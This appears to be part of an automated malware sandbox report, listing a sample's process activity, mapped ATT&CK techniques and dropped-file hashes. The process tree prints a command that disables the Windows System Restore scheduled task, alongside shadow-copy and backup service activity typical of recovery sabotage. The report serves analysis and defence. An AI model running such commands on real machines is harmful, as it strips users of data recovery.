C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:8032
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8284
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5812
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8116
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:13428
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:3440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 16656 -ip 166561⤵PID:16912
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51ec091ecc06be6b4db5bcdb418b47aba
SHA1e946f54b2a4563930ef71161956368691d66afbe
SHA256ebb33c80b5489d995d4221d5386b24e7cf8975159bddfe6edf691b5a2841257a
SHA51252b59d56e76ef4dacd2abe202347ec5fd477acd1c687f2c6864ef29ac17170fef3a61f5838ae938a41a0b842c5c4c6bf91dc9ccc136d42716c394539db1d87c6
-
Filesize
12KB
MD59901ff7cd07cfebac3556d4640c26e97
SHA131ed68ab34c28a47f5a598ee0ba289dc36383ad4
SHA25645c150eba54427b2cb28f8df5395ed73c3fd072aa3b28560484cd3716506a323
SHA51284914c17eacd90031a554c45c8ea3fb4a52008953fef11f2123a1894e54eb649664d2a7381aea65ff5e3c53cd1c836128d6b4fcf36348c971a20c9d1229faf8f
-
Filesize
684B
MD58fe2ef7312e5eaba4d67907ecf88fef4
SHA1be38bbee10889a5e6aecafcb438e1c140f0b2750
SHA256a9c67e093f432e9e61a8893b651e41e192a4214b6c37e2e3622ff3c87f312cc3
SHA51222a03f8865b8490173f5ace5818b91bab01fae365fe26736d1bcf93cc1a86aaf49d13377ac7b792e59330998085b1746ef777f5181c1fe02070f74ddd24317a5